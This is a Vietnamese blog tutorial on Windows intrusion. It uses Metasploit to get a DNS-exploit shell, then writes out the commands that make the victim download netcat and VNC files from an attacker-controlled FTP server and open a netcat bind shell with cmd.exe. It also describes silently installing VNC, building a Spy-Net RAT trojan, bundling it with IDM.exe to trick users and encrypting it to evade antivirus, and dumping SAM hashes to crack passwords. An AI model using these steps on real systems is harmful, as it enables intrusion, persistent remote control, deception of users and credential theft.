Home / Thủ Thuật / Hacking / Basic Hacking – Hacking cơ bản

Basic Hacking – Hacking cơ bản

  1. Khai thác lỗi DNS.
  2. Dùng Netcat để back connect.
  3. Remote install VNC lên máy Victim.
  4. Cách sử dụng Spy-Net để làm chủ đựợc máy Victim.
  5. System Hacking (đọc file SAM crack password ).

Trước khi muốn tấn công vào 1 server hay hệ thống nào đó thì ta phải tiến hành bước Foot Printing và Scanning, nhưng ở đây tôi bỏ qua bước Foot Printing. Scanning giúp ta thu thập thông tin của Victim ( vd: Victim sử dụng OS gì, đang mở những port nào…)
Ở bước Scanning này tôi sử dụng tool có tên là Zenmap (tool này có giao diện GUI) còn Nmap thì dùng bằng command. Giao diện của Zenmap như sau:

Click image for larger version. 

Name:	1.jpg 
Views:	56 
Size:	50.2 KB 
ID:	850

Click image for larger version. 

Name:	2.jpg 
Views:	47 
Size:	158.8 KB 
ID:	851

Sau khi Scan ta xác định được Server(Victim) có open port 53 (dịch vụ DNS)
Tiếp theo ta dùng Metasploit Framework để scan lỗi DNS.

Click image for larger version. 

Name:	3.jpg 
Views:	47 
Size:	117.5 KB 
ID:	852

Sau khi Execute và điền thông tin về OS server, IP … thì ta chiếm dc shell của Victim

Click image for larger version. 

Name:	4.jpg 
Views:	47 
Size:	129.2 KB 
ID:	853

Khi chiếm được shell của Victim rồi thì ta có thể add user và thăng quyền …
Để fix lỗi DNS này thì ta vào cách link trong References để xem thông tin về Bug này và download các bản vá lỗi.
Sau khi chiếm được shell của Victim rồi ta dùng command ra lệnh cho victim lên FTP server của ta hay lên web để download file netcat về để dành sau này nếu Victim fix lỗi DNS thì còn back connect lại được. >.<
Từ shell mà chiếm được ở trên ta tạo ra các lệnh mà client sẽ chạy để lên FTP server download netcat về và các command đó ta bỏ vào file tên là netcat.txt:

Echo open 192.168.3.150>netcat.txt <= connect đến FTP Server
Echo administrator>>netcat.txt <= username FTP
Echo 123>>netcat.txt <= password FTP
Echo binary>>netcat.txt <= File type
Echo prompt n>>netcat.txt <= tắt prompt khi download file
Echo mget nc.exe>>netcat.txt <= get file nc.exe về
Echo quit>>netcat.txt <= thoát FTP

Sau khi thi hành các lệnh trên thì ta dùng type netcat.txt để xem lại các command mà ta add trong netcat.txt
Download file nc.exe

ftp –s:netcat.txt

Tiếp theo khi download file nc.exe về máy rồi thì ta cho netcat listen ở port 1234 để lần sau ta back connect lại máy Victim với port 1234.

Nc –nvv –Lp 1234 –e cmd.exe

Với –n: chỉ dùng địa chỉ IP mà không truy vấn DNS

-vv: hiển thị chi tiết các thông tin về kết nối hiện tại.
-L: buộc Netcat “cố” lắng nghe, nẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-p: port, chỉ định cổng port mà netcat listen.
-e: yêu cầu netcat thi hành chương trình, thường dùng trong chế độ lắng nghe.

=> Sau khi ra lệnh cho Victim listening ở port 1234, từ máy Attacker ta connect tới Victim trên port 1234

Nc 192.168.3.200 1234

Ngoài cách sử dụng netcat ta có thể sử dụng BindPort do T4mQu0c code để back connect
Khi client chạy file BindPort thì client sẽ listening port 9999. Khi này ta dùng netcat để back connect lại máy Victim thông qua port 9999. Đặc điểm của con BindPort này là khi Victim phát hiện ra máy mình đang có process BindPort chạy thì Victim không thể End process được.

Tiếp theo là Remote install VNC lên máy Victim:
Từ shell của Victim ta thi hành command sau để tạo ra file vnc.txt để cho Victim download files vnc trên FTP Server:

Echo open 192.168.3.150>vnc.txt
Echo administrator>> vnc.txt
Echo 123>> vnc.txt
Echo binary>> vnc.txt
Echo prompt n>> vnc.txt
Echo cd vnc>>vnc.txt <= vào thư mục vnc
Echo mget *.*>> vnc.txt <= download tất cả các file trong vnc folder
Echo quit>> vnc.txt

Download các file trong vnc folder trên FTP Server:

ftp –s:vnc.txt

Cài đặt VNC:
Các file trong vnc folder mà ta đã download về có file tên vnc.reg
Ta sẽ chạy file này để ghi vào trong regedit.
Lệnh merge file vnc.reg như sau:

Regedit /s C:vnc.reg

Sau khi chạy file vnc.reg rồi thì ta install winvnc.exe

Winvnc -install

Và cuối cùng là start services winvnc lên để có thể dùng VNC connect tới Victim

Net start winvnc

Cách sử dụng Spy-Net để làm chủ đựợc máy Victim
Soft sử dụng Spy-net [RAT] v1.8.
Chạy file spinet.exe để build ra file Trojan. File này có tác dụng khi client chạy nó thì client sẽ connect về server mà ta đã chỉ định trong quá trình build file.

Click image for larger version. 

Name:	5.jpg 
Views:	47 
Size:	63.8 KB 
ID:	854

Ta hoàn toàn làm chủ được máy Victim

Ví dụ: open 1 trang web do ta chỉ định, download/upload file lên máy victim

Để đánh lừa Victim thì ta có thể ghép file Trojan mình vừa build ra với 1 software bất kì
Ví dụ: ta ghép file trojan.exe với file IDM.exe chẳng hạn
Khi client chạy file IDM là trojan.exe nó chạy lun 😛
Ví dụ file trojan của ta bị software antivirus phát hiện thì ta có thể dùng tool mã hóa con trojan đó để bypass software anti-virus.

System Hacking (đọc file SAM crack password ).
Dãy thuật thường dùng là : LM Hash ( WinNT, 98) , NTLM & NTLM v2 (Win2003 trở lên)

Cách dùng đĩa Hiren Boot để ghi đè file SAM không phải là cracking tại vì mình không biết được password hiện tại.

LM Hash tối đa 14 kí tự và được chia làm 2 phần : 7 + 7

NTLM & NTLM v2 (băm chung)

Hiện nay WinXP và Win2003 đều dùng chung 2 dãy thuật là LM Hash và NTLM & NTLM v2.

Có rất nhiều soft hỗ trợ crack password nhưa LC5 và Cain. Ở đây tôi dùng pwdump7 để đọc file SAM và dùng đĩa OPHCrack để tự động dò password (password phải nhỏ hơn 14 kí tự).

Print Friendly

About dongpolice

Check Also

Web7: SQL injection – Các cách phòng chống và kết luận

Các cách phòng chống Trong các bài viết trước, tôi đã trình bày về cách …